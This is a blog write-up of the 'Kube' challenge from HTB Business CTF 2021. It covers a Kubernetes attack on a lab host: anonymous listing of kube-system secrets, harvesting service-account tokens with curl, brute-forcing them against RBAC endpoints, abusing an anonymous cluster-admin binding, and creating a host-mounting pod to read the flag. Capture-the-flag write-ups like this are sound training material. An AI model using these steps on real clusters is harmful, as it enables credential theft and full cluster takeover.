HTB Business CTF 2021 — Kube

Arifin
5 min readJul 29, 2021

Hi guys! It’s been a long time not writing a post since my last post. In this post I want to share write-ups from HTB Business CTF 2021 which I joined last week with my company colleague at Vantage Point Security Indonesia. FYI, we get rank 13 globally and get #1 rank in Indonesian! *yeay*. I solved 2 challenges in cloud category, and in this post I want to share write-ups for challenge Kube. (for Theta challenge I also post in here)

In this challenge, just like the challenge called Kube, it looks like I will focus more on Kube services. Starting with scanning all open ports in the host using naabu.

scanning open port

Found several open port running Kube services, such as 10249–10256/tcp Kubelet API, 2379–2380/tcp etcd API, and 8443/tcp Kubernetes API server.
Then, I opened port 8443 to enumerate more deep into the Kubernetes services. First try, I want to list all namespaces in Kubernetes using this endpoint API https://10.129.95.171:8443/api/v1/namespaces.

I found 4 namespaces in the Kubernetes which are, default, kube-node-lease, kube-public, and kube-system. Then, I try to enumerate in every namespace to find the Secrets list and get all token from the services account in the Kubernetes using this endpoint API https://10.129.95.171:8443/api/v1/namespaces/[namespace-name]/secrets.

After enumeration in every namespace, I found some juicy information in kube-system namespaces.

secrets list in ns kube-system

Found 36 service accounts which contain a token for each account. Below is a sample information about the service account.

{
"metadata": {
"name": "attachdetach-controller-token-5ts7m",
"namespace": "kube-system",
"uid": "ff42960f-f063-4df3-b330-e4cbc26f56d4",
"resourceVersion": "356",
"creationTimestamp": "2021-07-19T19:06:55Z",
"annotations": {
"kubernetes.io/service-account.name": "attachdetach-controller",
"kubernetes.io/service-account.uid": "b780d31d-3e92-40af-8a12-dbec2d4e5675"
},
"managedFields": [
{
"manager": "kube-controller-manager",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-07-19T19:06:55Z",
"fieldsType": "FieldsV1",
"fieldsV1": {"f:data":{".":{},"f:ca.crt":{},"f:namespace":{},"f:token":{}},"f:metadata":{"f:annotations":{".":{},"f:kubernetes.io/service-account.name":{},"f:kubernetes.io/service-account.uid":{}}},"f:type":{}}
}
]
},
"data": {
"ca.crt": "LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCakNDQWU2Z0F3SUJBZ0lCQVRBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwdGFXNXAKYTNWaVpVTkJNQjRYRFRJeE1EY3hPREU1...snipped...",
"namespace": "a3ViZS1zeXN0ZW0=",
"token": "ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklrMVlTbFZxVDBwM2QyTnRNVzk1V2xCM09Ua3hRMEpmYW1oTmVHMHhUMlZTZUVOSVRITmZZV3gwYldzaWZRLmV5SnBjM01pT2lKcmRXSmxjbTVsZEdWekwz...snipped..."
},
"type": "kubernetes.io/service-account-token"
}

Some of the information that can be highlighted is the Token variable which means I able to use the token from every service account to go deeper into the Kubernetes.
The approach is to get all the token, and then use the token to check what a service account is able to use the Kubernetes RBAC (role-based access control) endpoint API. First, using curl and grep the token.

$ curl -k https://10.129.95.171:8443/api/v1/namespaces/kube-system/secrets/ | grep -i "ZXlK" | cut -d ":" -f 2 | sed 's/"//g' > token.txt

Then using BurpSuite to conduct brute-forcing with all the tokens. First, set-up the endpoint API to /apis/rbac.authorization.k8s.io/v1/clusterrolebindings and set-up the payload position to Authorization: Bearer $$ because in the Kubernetes API, authorization for call the API is using JWT Bearer token.

set-up API endpoint and payload position

After that, set-up the payloads. First load the file token.txt and set payload processing with base64-decode because the tokens are in the base64 encoding format.

set-up payload list and processing

After everything is set, Start-attack!. And then, 2 minutes later the result came out. Found that 4 service accounts are able to use endpoint RBAC to check roles in Kubernetes.

the result

Those 4 service accounts are default, generic-garbage-collector, namespace-controller, resourcequota-controller.
Next approach is that I want to get all the existing RBAC rules in Kubernetes use endpoint:

/apis/rbac.authorization.k8s.io/v1/clusterrolebindings
/apis/rbac.authorization.k8s.io/v1/clusterroles /apis/rbac.authorization.k8s.io/v1/rolebindings/apis/rbac.authorization.k8s.io/v1/roles

Choose one service account, for example I use namespace-controller and copy the token into the export variable name (to make it easy).

$ export TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6Ik1YSlVqT0p3d2NtMW95WlB3OTkxQ0JfamhNeG0xT2VSeENITHNfYWx0bWsifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZ..snipped..

Then use curl to get all the RBAC rules.

$ curl -k — header “Authorization: Bearer $TOKEN” https://10.129.95.171:8443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings > clusterrolebindings.json$ curl -k — header “Authorization: Bearer $TOKEN” https://10.129.95.171:8443/apis/rbac.authorization.k8s.io/v1/clusterroles > clusterroles.json$ curl -k — header “Authorization: Bearer $TOKEN” https://10.129.95.171:8443/apis/rbac.authorization.k8s.io/v1/rolebindings > rolebindings.json$ curl -k — header “Authorization: Bearer $TOKEN” https://10.129.95.171:8443/apis/rbac.authorization.k8s.io/v1/roles > roles.json

Then I use Kubernetes RBAC audit tools from cyberark to audit the RBAC that I have got using this command:

$ python3 check-rbac.py — clusterRole clusterroles.json — role Roles.json — rolebindings rolebindings.json — cluseterolebindings clusterrolebindings.json

The result shows that anonymous-role has privilege cluster-admin and anonymous-binding to system:anonymous. Hmm, something fishy in this Kubernetes.

result rbac-check

I immediately set kube config, and use kubectl to enumerate more deeply.

apiVersion: v1
clusters:
- cluster:
certificate-authority: /HTB-Bus-CTF/ca.crt
server: https://10.129.95.171:8443
name: HTB
contexts:
- context:
cluster: HTB
namespace: kube-system
current-context: HTB

First, I list all pods in the namespace kube-system.

$ kubectl get pods -n kube-system -o wide
list pods in ns kube-system

Found 8 pods in kube-system, and contained one pod error with “ImagePullBackOff”. I guessed the Kubernetes cannot pull images from external resources. So, I list all local images that contain in the internal resources.

$ kubectl get pods — all-namespaces -o jsonpath=”{.items[*].spec.containers[*].image}” | tr -s ‘[[:space:]]’ ‘\n’ | sort | uniq -c
list local images

After that, I try to create a new pod in the kube-system with local resources images. Below is the yaml file to create a new pod.

flagspods.yaml

Short explanation, I create a new pod to mount into the host using images kube-proxy:v1.21.2 and get the file flag.
Then create the pods with the yaml file.

$ kubectl create -f flagpods.yaml --validate=false
success create a new pod

Violaa! Successfully created the pods. Btw, I use --validate=false because the default is true and if the validate=true Kubernetes will check all of the resources API (CMIIW).

Then check the logs from pod “get-flags”.

$ kubectl logs get-flags
check logs pods get-flags

Get the flag! HTB{5y573m:4N0nYM0u5}

--

--

Arifin
Arifin

Written by Arifin

Full-time Hamba Allah. Part-time Infosec Boy.

No responses yet